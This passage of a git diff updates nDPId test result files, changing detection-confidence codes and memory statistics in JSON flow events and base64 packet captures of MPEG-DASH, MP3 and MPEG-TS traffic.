00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1652784808500,"flow_last_seen":1652784808500,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1652784808500,"l3_proto":"ip4","src_ip":"54.161.101.85","dst_ip":"192.168.2.105","src_port":80,"dst_port":59144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1652784808500,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1652784808500,"pkt":"wDiWIaSptKXvZygQCABFAAXUcu5AAOwGty02oWVVwKgCaQBQ5wi4j+HSMIk\/coAQANuo3AAAAQEICq8dXZ\/GziZPSFRUUC8xLjEgMjAwIE9LDQpEYXRlOiBUdWUsIDE3IE1heSAyMDIyIDEwOjUzOjI4IEdNVA0KU2VydmVyOiBBcGFjaGUvMi40LjUzICgpIE9wZW5TU0wvMS4wLjJrLWZpcHMgbW9kX3dzZ2kvNC43LjEgUHl0aG9uLzMuNw0KVXBncmFkZTogaDIsaDJjDQpDb25uZWN0aW9uOiBVcGdyYWRlDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkV4cGlyZXM6IC0xDQpEQVNILUxpdmUtU2ltdWxhdG9yOiBEQVNILUlGIGxpdmUgREFTSCBzaW11bGF0b3IgMi4wLjENCkFjY2Vzcy1Db250cm9sLUFsbG93LUhlYWRlcnM6IG9yaWdpbixyYW5nZSxhY2NlcHQtZW5jb2RpbmcscmVmZXJlcg0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctTWV0aG9kczogR0VULEhFQUQsT1BUSU9OUw0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctT3JpZ2luOiAqDQpBY2Nlc3MtQ29udHJvbC1FeHBvc2UtSGVhZGVyczogU2VydmVyLHJhbmdlLENvbnRlbnQtTGVuZ3RoLENvbnRlbnQtUmFuZ2UsRGF0ZQ0KQ29udGVudC1MZW5ndGg6IDk0NA0KQ29udGVudC1UeXBlOiB2aWRlby9tcDQNCg0KAAAAHGZ0eXBpc281AAAAAWF2YzFpc281ZGFzaAAAAAhmcmVlAAAAYGZyZWVJc29NZWRpYSBGaWxlIFByb2R1Y2VkIHdpdGggR1BBQyAwLjUuMi1ERVYtcmV2VmVyc2lvbjogMC41LjItNDI2LWdjNWFkNGU0K2Rmc2c1LTFidWlsZDEAAAADLG1vb3YAAABsbXZoZAAAAAAAAAAAAAAAAAAAA+gAAAAAAAEAAAEAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAABIbXZleAAAABBtZWhkAAAAAAA27oAAAAAgdHJleAAAAAAAAAABAAAAAQAAAgAAAAAAAAEAAAAAABB0cmVwAAAAAAAAAAEAAAIOdHJhawAAAFx0a2hkAAAAAwAAAADVk9GpAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAQAAAAAUAAAAC0AAAAAAAJGVkdHMAAAAcZWxzdAAAAAAAAAABAAAAAAAABAAAAQAAAAABhm1kaWEAAAAgbWRoZAAAAAAAAAAAAAAAAAAAPAAAAAAAFccAAAAAAC1oZGxyAAAAAAAAAAB2aWRlAAAAAAAAAAAAAAAAVmlkZW9IYW5kbGVyAAAAATFtaW5mAAAAFHZtaGQAAAABAAAAAAAAAAAAAAAkZGluZgAAABxkcmVmAAAAAAAAAAEAAAAMdXJsIAAAAAEAAADxc3RibAAAAKVzdHNkAAAAAAAAAAEAAACVYXZjMQAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAUAAtAASAAAAEgAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABj\/\/wAAAD9hdmNDAWQAH\/\/hACNnZAAfrNlAUAW6EAAAAwAQAAADA8ZKAAknwAEk\/mkwB4wYywEABWjr7LIs\/Pj4AAAAABBzdHRzAAAAAAAAAAAAAAAQc3RzYwAAAAAAAAAAAAAAFHN0c3oAAAAAAAAAAAAAAAAAAAAQc3RjbwAAAAAAAAAAAAAAYnVkdGEAAABabWV0YQAAAAAA"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1652784808500,"flow_last_seen":1652784808500,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1652784808500,"l3_proto":"ip4","src_ip":"54.161.101.85","dst_ip":"192.168.2.105","src_port":80,"dst_port":59144,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Media"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1652784808500,"flow_last_seen":1652784808500,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1652784808500,"l3_proto":"ip4","src_ip":"54.161.101.85","dst_ip":"192.168.2.105","src_port":80,"dst_port":59144,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Media"}} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1652784808500,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1652784808500,"pkt":"tKXvZygQwDiWIaSpCABFAAA0NqpAAEAGpRLAqAJpNqFlVecIAFAwiT9yuI\/ncoAQAfUkJQAAAQEICsbOJrmvHV2f"} 00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1652784808501,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1652784808501,"pkt":"wDiWIaSptKXvZygQCABFAACBcu9AAOwGvH82oWVVwKgCaQBQ5wi4j+dyMIk\/coAYANvyTQAAAQEICq8dXZ\/GziZPAAAhaGRscgAAAAAAAAAAbWRpcmFwcGwAAAAAAAAAAAAAAAAtaWxzdAAAACWpdG9vAAAAHWRhdGEAAAABAAAAAExhdmY1Ni40MC4xMDE="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1652784814543,"flow_last_seen":1652784814543,"flow_idle_time":7580000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59146,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1652784814543,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":257,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":257,"pkt_l4_len":223,"thread_ts_msec":1652784814543,"pkt":"tKXvZygQwDiWIaSpCABFAADzRtZAAEAGlCfAqAJpNqFlVecKAFBASLN\/hVfSJoAYAfZzRwAAAQEICsbOPlSvHXU7R0VUIC9saXZlc2ltL3N0c18xNjUyNzgzODA5L3NpZF80MGMxMWUxMi9jaHVua2R1cl8xL2F0b183L3Rlc3RwaWM0XzhzL1YyNDAwLzIwNjU5ODA5OS5tNHMgSFRUUC8xLjENCkhvc3Q6IGxpdmVzaW0uZGFzaGlmLm9yZw0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNClVzZXItQWdlbnQ6IFZMQy8zLjAuMTYgTGliVkxDLzMuMC4xNg0KDQo="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1652784814543,"flow_last_seen":1652784814543,"flow_idle_time":7580000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59146,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1652784807797,"flow_last_seen":1652784807901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59142,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1652784808500,"flow_last_seen":1652784808514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1708,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"54.161.101.85","dst_ip":"192.168.2.105","src_port":80,"dst_port":59144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Media"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1652784814543,"flow_last_seen":1652784814543,"flow_idle_time":7580000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59146,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1618744212035,"flow_last_seen":1618744212338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1728,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"10.84.1.81","dst_ip":"166.248.152.10","src_port":60926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP.MpegDash","breed":"Acceptable","category":"Media"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1652784814543,"flow_last_seen":1652784814543,"flow_idle_time":7580000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59146,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1652784807797,"flow_last_seen":1652784807901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59142,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1652784808500,"flow_last_seen":1652784808514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1708,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"54.161.101.85","dst_ip":"192.168.2.105","src_port":80,"dst_port":59144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Media"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1652784814543,"flow_last_seen":1652784814543,"flow_idle_time":7580000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59146,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1618744212035,"flow_last_seen":1618744212338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1728,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"10.84.1.81","dst_ip":"166.248.152.10","src_port":60926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"HTTP.MpegDash","breed":"Acceptable","category":"Media"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","packets-captured":13,"packets-processed":13,"total-skipped-flows":0,"total-l4-payload-len":3811,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":26,"global_ts_msec":1652784814543} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 13/13 @@ -32,9 +32,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5873505 bytes -~~ total memory freed........: 5873505 bytes -~~ total allocations/frees...: 118148/118148 +~~ total memory allocated....: 6007139 bytes +~~ total memory freed........: 6007139 bytes +~~ total allocations/frees...: 120910/120910 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2405 chars diff --git a/test/results/mpeg.pcap.out b/test/results/mpeg.pcap.out index 19073827c..0ed7b42f1 100644 --- a/test/results/mpeg.pcap.out +++ b/test/results/mpeg.pcap.out @@ -4,9 +4,9 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434379491040,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1434379491040,"pkt":"yGyHABajPBXCt3IOCABFAABAOE9AAEAGJUTAqFCgLmWdd9n8AFBP68YoAAAAALAC\/\/\/OTgAAAgQFtAEDAwUBAQgKFSiGAAAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434379491117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1434379491117,"pkt":"PBXCt3IOyGyHABajCABFAAA8AABAADIGa5cuZZ13wKhQoABQ2fyPIjpcT+vGKaAScSAIFwAAAgQFqAQCCAoAu5vaFSiGAAEDAwhf8g=="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434379491117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1434379491117,"pkt":"yGyHABajPBXCt3IOCABFAAA02wVAAEAGgpnAqFCgLmWdd9n8AFBP68YpjyI6XYAQECCXiwAAAQEIChUohk0Au5va"} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1434379491040,"flow_last_seen":1434379491117,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1434379491117,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Network"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":0,"content_type":"","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1434379491040,"flow_last_seen":1434379491158,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1434379491158,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":200,"content_type":"audio\/mpeg","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1434379491040,"flow_last_seen":1434379491221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":9363,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1434379491221,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1434379491040,"flow_last_seen":1434379491117,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1434379491117,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Network"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":0,"content_type":"","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1434379491040,"flow_last_seen":1434379491158,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1434379491158,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":200,"content_type":"audio\/mpeg","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1434379491040,"flow_last_seen":1434379491221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":9363,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1434379491221,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":19,"source":"mpeg.pcap","alias":"nDPId-test","packets-captured":19,"packets-processed":19,"total-skipped-flows":0,"total-l4-payload-len":9363,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1434379491221} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 19/19 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870052 bytes -~~ total memory freed........: 5870052 bytes -~~ total allocations/frees...: 118136/118136 +~~ total memory allocated....: 6003686 bytes +~~ total memory freed........: 6003686 bytes +~~ total allocations/frees...: 120898/120898 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 800 chars diff --git a/test/results/mpegts.pcap.out b/test/results/mpegts.pcap.out index 04d5e9301..7bc31e0b2 100644 --- a/test/results/mpegts.pcap.out +++ b/test/results/mpegts.pcap.out @@ -2,8 +2,8 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1435209297954} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435209297954,"flow_last_seen":1435209297954,"flow_idle_time":200000,"flow_min_l4_payload_len":1316,"flow_max_l4_payload_len":1316,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":1316,"midstream":0,"thread_ts_msec":1435209297954,"l3_proto":"ip4","src_ip":"10.1.16.48","dst_ip":"230.200.201.23","src_port":40737,"dst_port":1234,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1435209297954,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1362,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1362,"pkt_l4_len":1324,"thread_ts_msec":1435209297954,"pkt":"AQBeSMkXrPHfGMSBgQANHwgARQAFQAAAQAAHEaScCgEQMObIyRefIQTSBSxl6UcBARcAD7wd249nI5BqMCydEQCD1YeFyAwoYGMeHIwcYCWAHEkET\/taR\/5YANOTSagKaodBkABeSU4ooP2cAgISCfI7GswCLhYGUDAuoQXALotIDoDAaSxnQetyw1wSf\/AKkMmAETWkokF4lgj\/+lAZSgnOA6QAiGVAYA8goTB50WWTRpqMHIxOOJ8\/G9fR\/gRwAyKEkesyBkAB8oyaCwrrgKE0mAZ74p+4IoA5RfCyWS8HBk6egclHP3xARwEBGEEXVAcUcasfHBwWuxBEA0AR3\/itnAslgP4YRyyuCUAHIGOdlcBl0VAUgAPrJ4fANDAD4iy\/w8TBHHBQGqzAH4UZAHtGCiNQgPA1JISSwngX6AHm4Jf\/mKVIQhIaSD8CMAMGBoJf\/aEdACJNQ4OIkGi0bLH9Meczk8i+AAAAAQ4ShEUQIiWUxLGqxZhYCkaHcmBJHgFBLPZRvGhAjlBpCLwBHUOLiXyWkJ41IhP4BH1T\/uSXFhIJn\/tHAQEZ0kepcDEADUYFzAA1cjMHnioWBMyEDwGRt7NwM5CBuOLJQCnAKi98MAR7oiygHZNJiEoKSG4lmBgaTAxKQSf+iYWQguoQIAGwERxFmI3UAusNyXAUqSlbJ5X4WGOUAQUpObs+A8kBs4JQAaEE6oSWAdQMP\/9ghf9DiGSh5LAYDApaSdFFANnYrBjoHYtBPLLKRUBQDgP0DT\/\/ORgDyJQaGBg0vAKAK8BxyZ0AZ4